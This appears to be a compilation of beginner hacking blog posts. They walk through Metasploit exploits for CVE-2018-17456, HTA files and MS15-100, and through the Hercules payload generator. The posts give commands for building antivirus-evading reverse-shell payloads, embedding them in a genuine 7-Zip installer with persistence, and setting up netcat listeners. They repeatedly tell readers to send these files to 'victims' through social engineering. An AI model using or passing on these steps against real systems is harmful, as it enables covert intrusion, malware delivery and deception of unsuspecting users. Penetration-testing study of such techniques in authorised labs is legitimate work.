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Testing CVE 2018 17456 with Metasploit

Hello aspiring ethical hackers. In our previous blogpost, you learnt how to use Metasploit framework. In this article, you will learn what is CVE-2018-17456 vulnerability and how to test this vulnerability with Metasploit.

What is CVE-2018-17456 vulnerability?

CVE-2018-17456 is a vulnerability affecting submodules of Git. A Git submodule is a repository that is included within another Git repository. The vulnerability arises when a submodule URL which starts with a dash e.g “-u./payload” is passed as an argument to git clone, the file “payload” inside the repository is executed. This vulnerability affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.

This Metasploit module creates a fake git repository which contains a submodule containing the payload. The vulnerability is triggered when the submodules are initialized or cloned. (e.g git clone –recurse-submodules URL)

This module is a local exploit module and works on Git versions 2.7.5 and lower. Now let us see how this module works. Start Metasploit and load the exploit module as shown below. Type command “show options” to see all the options we need for this module to run.


Set the options LHOST, git_uri and LPORT options as shown below. The git_uri option sets the URL malicious git submodule. Use command “run” to start our Git HTTP server.


All we need to do now is send the URL of the Git repository we created to target users. This requires social engineering. As the user clones this URL, we will get a command session on the target. Here we are testing this on KaIi Linux 2016 machine which has the vulnerable version of Git installed. Let’s see what happens on the target machine.


As this happens on our target system, we will get a command shell on our attacker system as shown below.


We can see the active sessions using the command “sessions”.


That is how you can test for CVE 2018 17456 vulnerability. Learn about PrintNightmare vulnerability.

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HTA attack for beginners

Hello aspiring hackers. In our previous blogpost, you learnt about Windows hacking. In this article, you will learn about HTA attack, an attack that helps in gaining access to Windows systems. In this attack, HTA file are used to hack the target system.

What is a HTA file?

What is HTA file? HTA stands for HTML application. An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript. A HTA file gets executed without the constraints of the internet browser security model. In simple words, it gets executed as a “fully trusted” application.

Let’s see an example of how to create this attack. For this, we will be using Metasploit’s windows/misc/hta_server module. In this module, the server hosts a HTA file, which when opened on the target system, will execute a payload via PowerShell. Of course, the browser warns the user before executing the payload. But social engineering can be used to convince the target users to execute the HTA file.

Now let’s see how this attack works. We will use this exploit to gain access to Windows 10 target. Start Metasploit and load the module as shown below.

Htawebserver1 300x164 1

Set the reverse meterpreter payload.


Type command “show options” to see the options we need to set for this exploit. Set the required options and type command “run” to start the exploit.

Image explaining about usage of hta web server exploit

As you can see, it has generated an URL where the payload is being hosted. We need to make the target user click on this URL. When the target user clicks on this URL as shown below.


The browser opens and prompts a warning about the file as shown below.


When the user ignores the warning and clicks on “run”, a meterpreter session is opened as shown below.


This session can be viewed and opened as shown below.


That’s how HTA attack works.

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Beginners guide to Hercules Framework

Hello, aspiring ethical hackers. In our previous blogpost, you learnt what are payload generators. In this blogpost, you will learn about a payload generator that enables you bypass Antivirus on the target system. This is Hercules framework. HERCULES is a customizable payload generator that can bypass antivirus software. Let’s see how it works.

Let’s start by cloning Hercules framework from github as shown below.


After cloning, a new directory with name HERCULES will be created. Move into that directory and do a “ls”. We should see a file named “Setup”. First change the permissions of this file using chmod as shown below. Once we get execute permissions on the Setup file, execute the file using command “./Setup“.


The setup automatically installs Hercules as shown below and


successfully ends as shown below. You have successfully installed Hercules framework in Kali Linux.


Type command “HERCULES” to start the framework. It’s interface looks like below. In this part, let’s generate a payload. Enter option “1”.

Image explaining about the usage of Hercules Framework for Windows exploitation

Select what type of payload you want to create. There are four payloads as shown below. I am choosing the first one. You can choose appropriately.


After we select the type of payload we want to create, we need to enter some options. Let us see the options it provides. LHOST and LPORT are self explanatory. Choosing Persistence function adds our running binary to Windows startup registry so that we can have persistent access to the target. Since we have already know how to create a persistent backdoor we will not enable it here.

Migration function triggers a loop that tries to migrate to a remote process. UPX ( Ultimate Packer for executables ) is an open source executable packer. To those newbies who have no idea what packers are, they are used to compress the executables. Software vendors also use them to obfuscate the code. We will see more about packers in our future howtos.

Concerning this howto, remember that enabling migration, persistence and UPX functions may increase the chances of your payload being detected by Antivirus.


Here I have only enabled the UPX function so the packing process begins as shown below.


Once the packing process is over, your final binary file is stored with the name you have given to it. I named it as “res”.


Next start the listener on Metasploit as shown below and send the binary file to our target. Once he clicks on our executable file, we will get the meterpreter session as shown below.


That’s how we use Hercules for generating Fully UnDetectable (FUD) payloads. Learn how to create FUD payloads using Veil Framework.

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Beginners guide to hacking Windows

Hello aspiring Ethical Hackers. Today we will learn about a payload generator that I used in hacking Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP, it can only be done by sending payloads in portable executables. The biggest challenge in sending these malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules is a special payload generator for hacking Windows that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone to clone Hercules into Kali Linux.


The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.


Now type command go build HERCULES.goto build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.


Now its time to create our payload. Type command,

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic

Let me explain this command. – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.

hacking windows 10

Our payload’s name is payload.exe. Type “ls” as shown below. Now send this file to our victim using your creativity.


On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.


Type command helpto see all the commands we can execute on our target system.


For example, type command systeminfoto see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.


So let’s add a little bit reality to our payload this time. Now we will add two things : persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.


So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).


When the user clicks on “yes”, the installation will progress normally on the victim’s system.


And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back. Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.


That was all about hacking Windows 10 with Hercules Payload Generator.

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Using MS15-100 vulnerability to hack Windows

Hello aspiring ethical hackers. In this howto, we will see how to hack Windows 7 with MS15-100 with recently released ms15-100 Microsoft Windows Media Center MCL exploit. For this, I am gonna use pentest lab i created in our previous howto. I am using Kali Linux as my attacker system for hacking windows 7.

Start Metasploit by typing command “msfconsole”. Search for our exploit using command as shown below.

hack windows 7

Load the exploit as shown below.

Ms15 100b

Set the IP address of Kali Linux to “srvhost” option. Set payload as “windows/meterpreter/reverse_tcp“. Set Lhost as IP address of Kali Linux.

Ms15 100c

Check if all the necessary options are set by typing command “show options“. Now run the exploit by typing command “exploit“. You will get the following result. Now copy the underlined link and send it to your victim.

Ms15 100d

When your victim clicks on the link, he will get a popup asking him to download and save the file.

Ms15 100e

When the user clicks on the downloaded file, we will get a meterpreter session on our attacker system as shown below. Type command “sessions -l ” to see the available sessions. We have one session available below.

Ms15 100f

Type command “sessions -i 1“( 1 is the session number available to us and can vary for you) to use the meterpreter session. Type “sysinfo” to know about the target system. Hurrah, we have successfully hacked our target.

Ms15 100g

That’s how we hack Windows 7 with MS15-100 exploit.